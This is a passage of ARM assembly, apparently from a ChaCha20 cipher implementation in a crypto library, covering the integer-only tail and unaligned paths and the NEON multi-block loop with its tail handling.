rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r4,r4,r8
eorhs r5,r5,r9
add r8,sp,#4*(8)
str r4,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r6,r6,r10
eorhs r7,r7,r11
str r5,[r14,#-12]
ldmia r8,{r8,r9,r10,r11} @ load key material
str r6,[r14,#-8]
add r0,sp,#4*(16+8)
str r7,[r14,#-4]
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
# ifdef __thumb2__
itt hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx" while at it
strhi r11,[sp,#4*(16+11)] @ copy "rx" while at it
add r2,r2,r10
add r3,r3,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r0,r0,r8
eorhs r1,r1,r9
add r8,sp,#4*(12)
str r0,[r14],#16 @ store output
# ifdef __thumb2__
itt hs
# endif
eorhs r2,r2,r10
eorhs r3,r3,r11
str r1,[r14,#-12]
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
# ifdef __thumb2__
itt hi
# endif
addhi r8,r8,#1 @ next counter value
strhi r8,[sp,#4*(12)] @ save next counter value
# ifdef __thumb2__
itt hs
# endif
ldrhs r8,[r12],#16 @ load input
ldrhs r9,[r12,#-12]
add r6,r6,r10
add r7,r7,r11
# ifdef __thumb2__
itt hs
# endif
ldrhs r10,[r12,#-8]
ldrhs r11,[r12,#-4]
# if __ARM_ARCH>=6 && defined(__ARMEB__)
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
# ifdef __thumb2__
itt hs
# endif
eorhs r4,r4,r8
eorhs r5,r5,r9
# ifdef __thumb2__
it ne
# endif
ldrne r8,[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
itt hs
# endif
eorhs r6,r6,r10
eorhs r7,r7,r11
str r4,[r14],#16 @ store output
str r5,[r14,#-12]
# ifdef __thumb2__
it hs
# endif
subhs r11,r8,#64 @ len-=64
str r6,[r14,#-8]
str r7,[r14,#-4]
bhi .Loop_outer
beq .Ldone
# if __ARM_ARCH<7
b .Ltail
.align 4
.Lunaligned: @ unaligned endian-neutral path
cmp r11,#64 @ restore flags
# endif
#endif
#if __ARM_ARCH<7
ldr r11,[sp,#4*(3)]
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
add r2,r2,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r3,r3,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r0,r8,r0 @ xor with input (or zero)
eor r1,r9,r1
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r2,r10,r2
strb r0,[r14],#16 @ store output
eor r3,r11,r3
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r1,[r14,#-12]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-8]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r3,[r14,#-4]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-15]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r1,[r14,#-11]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-7]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r3,[r14,#-3]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-14]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r1,[r14,#-10]
strb r2,[r14,#-6]
eor r0,r8,r0,lsr#8
strb r3,[r14,#-2]
eor r1,r9,r1,lsr#8
strb r0,[r14,#-13]
eor r2,r10,r2,lsr#8
strb r1,[r14,#-9]
eor r3,r11,r3,lsr#8
strb r2,[r14,#-5]
strb r3,[r14,#-1]
add r8,sp,#4*(4+0)
ldmia r8,{r8,r9,r10,r11} @ load key material
add r0,sp,#4*(16+8)
add r4,r4,r8 @ accumulate key material
add r5,r5,r9
add r6,r6,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r7,r7,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r4,r8,r4 @ xor with input (or zero)
eor r5,r9,r5
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r6,r10,r6
strb r4,[r14],#16 @ store output
eor r7,r11,r7
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r5,[r14,#-12]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-8]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r7,[r14,#-4]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-15]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r5,[r14,#-11]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-7]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r7,[r14,#-3]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-14]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r5,[r14,#-10]
strb r6,[r14,#-6]
eor r4,r8,r4,lsr#8
strb r7,[r14,#-2]
eor r5,r9,r5,lsr#8
strb r4,[r14,#-13]
eor r6,r10,r6,lsr#8
strb r5,[r14,#-9]
eor r7,r11,r7,lsr#8
strb r6,[r14,#-5]
strb r7,[r14,#-1]
add r8,sp,#4*(4+4)
ldmia r8,{r8,r9,r10,r11} @ load key material
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
# ifdef __thumb2__
itt hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx"
strhi r11,[sp,#4*(16+11)] @ copy "rx"
add r0,r0,r8 @ accumulate key material
add r1,r1,r9
add r2,r2,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r3,r3,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r0,r8,r0 @ xor with input (or zero)
eor r1,r9,r1
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r2,r10,r2
strb r0,[r14],#16 @ store output
eor r3,r11,r3
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r1,[r14,#-12]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-8]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r3,[r14,#-4]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-15]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r1,[r14,#-11]
eor r0,r8,r0,lsr#8
strb r2,[r14,#-7]
eor r1,r9,r1,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r3,[r14,#-3]
eor r2,r10,r2,lsr#8
strb r0,[r14,#-14]
eor r3,r11,r3,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r1,[r14,#-10]
strb r2,[r14,#-6]
eor r0,r8,r0,lsr#8
strb r3,[r14,#-2]
eor r1,r9,r1,lsr#8
strb r0,[r14,#-13]
eor r2,r10,r2,lsr#8
strb r1,[r14,#-9]
eor r3,r11,r3,lsr#8
strb r2,[r14,#-5]
strb r3,[r14,#-1]
add r8,sp,#4*(4+8)
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
# ifdef __thumb2__
itt hi
# endif
addhi r8,r8,#1 @ next counter value
strhi r8,[sp,#4*(12)] @ save next counter value
add r5,r5,r9
add r6,r6,r10
# ifdef __thumb2__
itete lo
# endif
eorlo r8,r8,r8 @ zero or ...
ldrhsb r8,[r12],#16 @ ... load input
eorlo r9,r9,r9
ldrhsb r9,[r12,#-12]
add r7,r7,r11
# ifdef __thumb2__
itete lo
# endif
eorlo r10,r10,r10
ldrhsb r10,[r12,#-8]
eorlo r11,r11,r11
ldrhsb r11,[r12,#-4]
eor r4,r8,r4 @ xor with input (or zero)
eor r5,r9,r5
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-15] @ load more input
ldrhsb r9,[r12,#-11]
eor r6,r10,r6
strb r4,[r14],#16 @ store output
eor r7,r11,r7
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-7]
ldrhsb r11,[r12,#-3]
strb r5,[r14,#-12]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-8]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-14] @ load more input
ldrhsb r9,[r12,#-10]
strb r7,[r14,#-4]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-15]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-6]
ldrhsb r11,[r12,#-2]
strb r5,[r14,#-11]
eor r4,r8,r4,lsr#8
strb r6,[r14,#-7]
eor r5,r9,r5,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r8,[r12,#-13] @ load more input
ldrhsb r9,[r12,#-9]
strb r7,[r14,#-3]
eor r6,r10,r6,lsr#8
strb r4,[r14,#-14]
eor r7,r11,r7,lsr#8
# ifdef __thumb2__
itt hs
# endif
ldrhsb r10,[r12,#-5]
ldrhsb r11,[r12,#-1]
strb r5,[r14,#-10]
strb r6,[r14,#-6]
eor r4,r8,r4,lsr#8
strb r7,[r14,#-2]
eor r5,r9,r5,lsr#8
strb r4,[r14,#-13]
eor r6,r10,r6,lsr#8
strb r5,[r14,#-9]
eor r7,r11,r7,lsr#8
strb r6,[r14,#-5]
strb r7,[r14,#-1]
# ifdef __thumb2__
it ne
# endif
ldrne r8,[sp,#4*(32+2)] @ re-load len
# ifdef __thumb2__
it hs
# endif
subhs r11,r8,#64 @ len-=64
bhi .Loop_outer
beq .Ldone
#endif
.Ltail:
ldr r12,[sp,#4*(32+1)] @ load inp
add r9,sp,#4*(0)
ldr r14,[sp,#4*(32+0)] @ load out
.Loop_tail:
ldrb r10,[r9],#1 @ read buffer on stack
ldrb r11,[r12],#1 @ read input
subs r8,r8,#1
eor r11,r11,r10
strb r11,[r14],#1 @ store output
bne .Loop_tail
.Ldone:
add sp,sp,#4*(32+3)
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
.size ChaCha20_ctr32_nohw,.-ChaCha20_ctr32_nohw
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl ChaCha20_ctr32_neon
.hidden ChaCha20_ctr32_neon
.type ChaCha20_ctr32_neon,%function
.align 5
ChaCha20_ctr32_neon:
ldr r12,[sp,#0] @ pull pointer to counter and nonce
stmdb sp!,{r0,r1,r2,r4-r11,lr}
adr r14,.Lsigma
vstmdb sp!,{d8,d9,d10,d11,d12,d13,d14,d15} @ ABI spec says so
stmdb sp!,{r0,r1,r2,r3}
vld1.32 {q1,q2},[r3] @ load key
ldmia r3,{r4,r5,r6,r7,r8,r9,r10,r11} @ load key
sub sp,sp,#4*(16+16)
vld1.32 {q3},[r12] @ load counter and nonce
add r12,sp,#4*8
ldmia r14,{r0,r1,r2,r3} @ load sigma
vld1.32 {q0},[r14]! @ load sigma
vld1.32 {q12},[r14] @ one
vst1.32 {q2,q3},[r12] @ copy 1/2key|counter|nonce
vst1.32 {q0,q1},[sp] @ copy sigma|1/2key
str r10,[sp,#4*(16+10)] @ off-load "rx"
str r11,[sp,#4*(16+11)] @ off-load "rx"
vshl.i32 d26,d24,#1 @ two
vstr d24,[sp,#4*(16+0)]
vshl.i32 d28,d24,#2 @ four
vstr d26,[sp,#4*(16+2)]
vmov q4,q0
vstr d28,[sp,#4*(16+4)]
vmov q8,q0
vmov q5,q1
vmov q9,q1
b .Loop_neon_enter
.align 4
.Loop_neon_outer:
ldmia sp,{r0,r1,r2,r3,r4,r5,r6,r7,r8,r9} @ load key material
cmp r11,#64*2 @ if len<=64*2
bls .Lbreak_neon @ switch to integer-only
vmov q4,q0
str r11,[sp,#4*(32+2)] @ save len
vmov q8,q0
str r12, [sp,#4*(32+1)] @ save inp
vmov q5,q1
str r14, [sp,#4*(32+0)] @ save out
vmov q9,q1
.Loop_neon_enter:
ldr r11, [sp,#4*(15)]
vadd.i32 q7,q3,q12 @ counter+1
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
vmov q6,q2
ldr r10, [sp,#4*(13)]
vmov q10,q2
ldr r14,[sp,#4*(14)]
vadd.i32 q11,q7,q12 @ counter+2
str r11, [sp,#4*(16+15)]
mov r11,#10
add r12,r12,#3 @ counter+3
b .Loop_neon
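@ Each pass of .Loop_neon covers 256 bytes: three blocks in NEON
@ registers (q0-q3, q4-q7, q8-q11 with counters n, n+1, n+2) interleaved
@ with one scalar block (counter n+3) in r0-r14. NEON has no rotate
@ instruction, so rol(x,n) is built as vshr.u32 #(32-n) plus vsli.32 #n,
@ and the 16-bit rotate is a single vrev32.16.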
.align 4
.Loop_neon:
subs r11,r11,#1
vadd.i32 q0,q0,q1
add r0,r0,r4
vadd.i32 q4,q4,q5
mov r12,r12,ror#16
vadd.i32 q8,q8,q9
add r1,r1,r5
veor q3,q3,q0
mov r10,r10,ror#16
veor q7,q7,q4
eor r12,r12,r0,ror#16
veor q11,q11,q8
eor r10,r10,r1,ror#16
vrev32.16 q3,q3
add r8,r8,r12
vrev32.16 q7,q7
mov r4,r4,ror#20
vrev32.16 q11,q11
add r9,r9,r10
vadd.i32 q2,q2,q3
mov r5,r5,ror#20
vadd.i32 q6,q6,q7
eor r4,r4,r8,ror#20
vadd.i32 q10,q10,q11
eor r5,r5,r9,ror#20
veor q12,q1,q2
add r0,r0,r4
veor q13,q5,q6
mov r12,r12,ror#24
veor q14,q9,q10
add r1,r1,r5
vshr.u32 q1,q12,#20
mov r10,r10,ror#24
vshr.u32 q5,q13,#20
eor r12,r12,r0,ror#24
vshr.u32 q9,q14,#20
eor r10,r10,r1,ror#24
vsli.32 q1,q12,#12
add r8,r8,r12
vsli.32 q5,q13,#12
mov r4,r4,ror#25
vsli.32 q9,q14,#12
add r9,r9,r10
vadd.i32 q0,q0,q1
mov r5,r5,ror#25
vadd.i32 q4,q4,q5
str r10,[sp,#4*(16+13)]
vadd.i32 q8,q8,q9
ldr r10,[sp,#4*(16+15)]
veor q12,q3,q0
eor r4,r4,r8,ror#25
veor q13,q7,q4
eor r5,r5,r9,ror#25
veor q14,q11,q8
str r8,[sp,#4*(16+8)]
vshr.u32 q3,q12,#24
ldr r8,[sp,#4*(16+10)]
vshr.u32 q7,q13,#24
add r2,r2,r6
vshr.u32 q11,q14,#24
mov r14,r14,ror#16
vsli.32 q3,q12,#8
str r9,[sp,#4*(16+9)]
vsli.32 q7,q13,#8
ldr r9,[sp,#4*(16+11)]
vsli.32 q11,q14,#8
add r3,r3,r7
vadd.i32 q2,q2,q3
mov r10,r10,ror#16
vadd.i32 q6,q6,q7
eor r14,r14,r2,ror#16
vadd.i32 q10,q10,q11
eor r10,r10,r3,ror#16
veor q12,q1,q2
add r8,r8,r14
veor q13,q5,q6
mov r6,r6,ror#20
veor q14,q9,q10
add r9,r9,r10
vshr.u32 q1,q12,#25
mov r7,r7,ror#20
vshr.u32 q5,q13,#25
eor r6,r6,r8,ror#20
vshr.u32 q9,q14,#25
eor r7,r7,r9,ror#20
vsli.32 q1,q12,#7
add r2,r2,r6
vsli.32 q5,q13,#7
mov r14,r14,ror#24
vsli.32 q9,q14,#7
add r3,r3,r7
vext.8 q2,q2,q2,#8
mov r10,r10,ror#24
vext.8 q6,q6,q6,#8
eor r14,r14,r2,ror#24
vext.8 q10,q10,q10,#8
eor r10,r10,r3,ror#24
vext.8 q1,q1,q1,#4
add r8,r8,r14
vext.8 q5,q5,q5,#4
mov r6,r6,ror#25
vext.8 q9,q9,q9,#4
add r9,r9,r10
vext.8 q3,q3,q3,#12
mov r7,r7,ror#25
vext.8 q7,q7,q7,#12
eor r6,r6,r8,ror#25
vext.8 q11,q11,q11,#12
eor r7,r7,r9,ror#25
vadd.i32 q0,q0,q1
add r0,r0,r5
vadd.i32 q4,q4,q5
mov r10,r10,ror#16
vadd.i32 q8,q8,q9
add r1,r1,r6
veor q3,q3,q0
mov r12,r12,ror#16
veor q7,q7,q4
eor r10,r10,r0,ror#16
veor q11,q11,q8
eor r12,r12,r1,ror#16
vrev32.16 q3,q3
add r8,r8,r10
vrev32.16 q7,q7
mov r5,r5,ror#20
vrev32.16 q11,q11
add r9,r9,r12
vadd.i32 q2,q2,q3
mov r6,r6,ror#20
vadd.i32 q6,q6,q7
eor r5,r5,r8,ror#20
vadd.i32 q10,q10,q11
eor r6,r6,r9,ror#20
veor q12,q1,q2
add r0,r0,r5
veor q13,q5,q6
mov r10,r10,ror#24
veor q14,q9,q10
add r1,r1,r6
vshr.u32 q1,q12,#20
mov r12,r12,ror#24
vshr.u32 q5,q13,#20
eor r10,r10,r0,ror#24
vshr.u32 q9,q14,#20
eor r12,r12,r1,ror#24
vsli.32 q1,q12,#12
add r8,r8,r10
vsli.32 q5,q13,#12
mov r5,r5,ror#25
vsli.32 q9,q14,#12
str r10,[sp,#4*(16+15)]
vadd.i32 q0,q0,q1
ldr r10,[sp,#4*(16+13)]
vadd.i32 q4,q4,q5
add r9,r9,r12
vadd.i32 q8,q8,q9
mov r6,r6,ror#25
veor q12,q3,q0
eor r5,r5,r8,ror#25
veor q13,q7,q4
eor r6,r6,r9,ror#25
veor q14,q11,q8
str r8,[sp,#4*(16+10)]
vshr.u32 q3,q12,#24
ldr r8,[sp,#4*(16+8)]
vshr.u32 q7,q13,#24
add r2,r2,r7
vshr.u32 q11,q14,#24
mov r10,r10,ror#16
vsli.32 q3,q12,#8
str r9,[sp,#4*(16+11)]
vsli.32 q7,q13,#8
ldr r9,[sp,#4*(16+9)]
vsli.32 q11,q14,#8
add r3,r3,r4
vadd.i32 q2,q2,q3
mov r14,r14,ror#16
vadd.i32 q6,q6,q7
eor r10,r10,r2,ror#16
vadd.i32 q10,q10,q11
eor r14,r14,r3,ror#16
veor q12,q1,q2
add r8,r8,r10
veor q13,q5,q6
mov r7,r7,ror#20
veor q14,q9,q10
add r9,r9,r14
vshr.u32 q1,q12,#25
mov r4,r4,ror#20
vshr.u32 q5,q13,#25
eor r7,r7,r8,ror#20
vshr.u32 q9,q14,#25
eor r4,r4,r9,ror#20
vsli.32 q1,q12,#7
add r2,r2,r7
vsli.32 q5,q13,#7
mov r10,r10,ror#24
vsli.32 q9,q14,#7
add r3,r3,r4
vext.8 q2,q2,q2,#8
mov r14,r14,ror#24
vext.8 q6,q6,q6,#8
eor r10,r10,r2,ror#24
vext.8 q10,q10,q10,#8
eor r14,r14,r3,ror#24
vext.8 q1,q1,q1,#12
add r8,r8,r10
vext.8 q5,q5,q5,#12
mov r7,r7,ror#25
vext.8 q9,q9,q9,#12
add r9,r9,r14
vext.8 q3,q3,q3,#4
mov r4,r4,ror#25
vext.8 q7,q7,q7,#4
eor r7,r7,r8,ror#25
vext.8 q11,q11,q11,#4
eor r4,r4,r9,ror#25
bne .Loop_neon
add r11,sp,#32
vld1.32 {q12,q13},[sp] @ load key material
vld1.32 {q14,q15},[r11]
ldr r11,[sp,#4*(32+2)] @ load len
str r8, [sp,#4*(16+8)] @ modulo-scheduled store
str r9, [sp,#4*(16+9)]
str r12,[sp,#4*(16+12)]
str r10, [sp,#4*(16+13)]
str r14,[sp,#4*(16+14)]
@ at this point we have first half of 512-bit result in
@ rx and second half at sp+4*(16+8)
ldr r12,[sp,#4*(32+1)] @ load inp
ldr r14,[sp,#4*(32+0)] @ load out
vadd.i32 q0,q0,q12 @ accumulate key material
vadd.i32 q4,q4,q12
vadd.i32 q8,q8,q12
vldr d24,[sp,#4*(16+0)] @ one
vadd.i32 q1,q1,q13
vadd.i32 q5,q5,q13
vadd.i32 q9,q9,q13
vldr d26,[sp,#4*(16+2)] @ two
vadd.i32 q2,q2,q14
vadd.i32 q6,q6,q14
vadd.i32 q10,q10,q14
vadd.i32 d14,d14,d24 @ counter+1
vadd.i32 d22,d22,d26 @ counter+2
vadd.i32 q3,q3,q15
vadd.i32 q7,q7,q15
vadd.i32 q11,q11,q15
cmp r11,#64*4
blo .Ltail_neon
vld1.8 {q12,q13},[r12]! @ load input
mov r11,sp
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12 @ xor with input
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
vst1.8 {q0,q1},[r14]! @ store output
veor q5,q5,q13
vld1.8 {q12,q13},[r12]!
veor q6,q6,q14
vst1.8 {q2,q3},[r14]!
veor q7,q7,q15
vld1.8 {q14,q15},[r12]!
veor q8,q8,q12
vld1.32 {q0,q1},[r11]! @ load for next iteration
veor d25,d25,d25
vldr d24,[sp,#4*(16+4)] @ four
veor q9,q9,q13
vld1.32 {q2,q3},[r11]
veor q10,q10,q14
vst1.8 {q4,q5},[r14]!
veor q11,q11,q15
vst1.8 {q6,q7},[r14]!
vadd.i32 d6,d6,d24 @ next counter value
vldr d24,[sp,#4*(16+0)] @ one
ldmia sp,{r8,r9,r10,r11} @ load key material
add r0,r0,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
vst1.8 {q8,q9},[r14]!
add r1,r1,r9
ldr r9,[r12,#-12]
vst1.8 {q10,q11},[r14]!
add r2,r2,r10
ldr r10,[r12,#-8]
add r3,r3,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
eor r0,r0,r8 @ xor with input
add r8,sp,#4*(4)
eor r1,r1,r9
str r0,[r14],#16 @ store output
eor r2,r2,r10
str r1,[r14,#-12]
eor r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
add r5,r5,r9
ldr r9,[r12,#-12]
add r6,r6,r10
ldr r10,[r12,#-8]
add r7,r7,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
eor r4,r4,r8
add r8,sp,#4*(8)
eor r5,r5,r9
str r4,[r14],#16 @ store output
eor r6,r6,r10
str r5,[r14,#-12]
eor r7,r7,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r6,[r14,#-8]
add r0,sp,#4*(16+8)
str r7,[r14,#-4]
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
ldr r8,[r12],#16 @ load input
add r1,r1,r9
ldr r9,[r12,#-12]
# ifdef __thumb2__
it hi
# endif
strhi r10,[sp,#4*(16+10)] @ copy "rx" while at it
add r2,r2,r10
ldr r10,[r12,#-8]
# ifdef __thumb2__
it hi
# endif
strhi r11,[sp,#4*(16+11)] @ copy "rx" while at it
add r3,r3,r11
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
# endif
eor r0,r0,r8
add r8,sp,#4*(12)
eor r1,r1,r9
str r0,[r14],#16 @ store output
eor r2,r2,r10
str r1,[r14,#-12]
eor r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
str r2,[r14,#-8]
str r3,[r14,#-4]
add r4,r4,r8 @ accumulate key material
add r8,r8,#4 @ next counter value
add r5,r5,r9
str r8,[sp,#4*(12)] @ save next counter value
ldr r8,[r12],#16 @ load input
add r6,r6,r10
add r4,r4,#3 @ counter+3
ldr r9,[r12,#-12]
add r7,r7,r11
ldr r10,[r12,#-8]
ldr r11,[r12,#-4]
# ifdef __ARMEB__
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
eor r4,r4,r8
# ifdef __thumb2__
it hi
# endif
ldrhi r8,[sp,#4*(32+2)] @ re-load len
eor r5,r5,r9
eor r6,r6,r10
str r4,[r14],#16 @ store output
eor r7,r7,r11
str r5,[r14,#-12]
sub r11,r8,#64*4 @ len-=64*4
str r6,[r14,#-8]
str r7,[r14,#-4]
bhi .Loop_neon_outer
b .Ldone_neon
.align 4
.Lbreak_neon:
@ harmonize NEON and integer-only stack frames: load data
@ from NEON frame, but save to integer-only one; distance
@ between the two is 4*(32+4+16-32)=4*(20).
str r11, [sp,#4*(20+32+2)] @ save len
add r11,sp,#4*(32+4)
str r12, [sp,#4*(20+32+1)] @ save inp
str r14, [sp,#4*(20+32+0)] @ save out
ldr r12,[sp,#4*(16+10)]
ldr r14,[sp,#4*(16+11)]
vldmia r11,{d8,d9,d10,d11,d12,d13,d14,d15} @ fulfill ABI requirement
str r12,[sp,#4*(20+16+10)] @ copy "rx"
str r14,[sp,#4*(20+16+11)] @ copy "rx"
ldr r11, [sp,#4*(15)]
ldr r12,[sp,#4*(12)] @ modulo-scheduled load
ldr r10, [sp,#4*(13)]
ldr r14,[sp,#4*(14)]
str r11, [sp,#4*(20+16+15)]
add r11,sp,#4*(20)
vst1.32 {q0,q1},[r11]! @ copy key
add sp,sp,#4*(20) @ switch frame
vst1.32 {q2,q3},[r11]
mov r11,#10
b .Loop @ go integer-only
.align 4
.Ltail_neon:
cmp r11,#64*3
bhs .L192_or_more_neon
cmp r11,#64*2
bhs .L128_or_more_neon
cmp r11,#64*1
bhs .L64_or_more_neon
add r8,sp,#4*(8)
vst1.8 {q0,q1},[sp]
add r10,sp,#4*(0)
vst1.8 {q2,q3},[r8]
b .Loop_tail_neon
.align 4
.L64_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
veor q2,q2,q14
veor q3,q3,q15
vst1.8 {q0,q1},[r14]!
vst1.8 {q2,q3},[r14]!
beq .Ldone_neon
add r8,sp,#4*(8)
vst1.8 {q4,q5},[sp]
add r10,sp,#4*(0)
vst1.8 {q6,q7},[r8]
sub r11,r11,#64*1 @ len-=64*1
b .Loop_tail_neon
.align 4
.L128_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
veor q5,q5,q13
vst1.8 {q0,q1},[r14]!
veor q6,q6,q14
vst1.8 {q2,q3},[r14]!
veor q7,q7,q15
vst1.8 {q4,q5},[r14]!
vst1.8 {q6,q7},[r14]!
beq .Ldone_neon
add r8,sp,#4*(8)
vst1.8 {q8,q9},[sp]
add r10,sp,#4*(0)
vst1.8 {q10,q11},[r8]
sub r11,r11,#64*2 @ len-=64*2
b .Loop_tail_neon
.align 4
.L192_or_more_neon:
vld1.8 {q12,q13},[r12]!
vld1.8 {q14,q15},[r12]!
veor q0,q0,q12
veor q1,q1,q13
vld1.8 {q12,q13},[r12]!
veor q2,q2,q14
veor q3,q3,q15
vld1.8 {q14,q15},[r12]!
veor q4,q4,q12
veor q5,q5,q13
vld1.8 {q12,q13},[r12]!
veor q6,q6,q14
vst1.8 {q0,q1},[r14]!
veor q7,q7,q15
vld1.8 {q14,q15},[r12]!
veor q8,q8,q12
vst1.8 {q2,q3},[r14]!
veor q9,q9,q13
vst1.8 {q4,q5},[r14]!
veor q10,q10,q14
vst1.8 {q6,q7},[r14]!
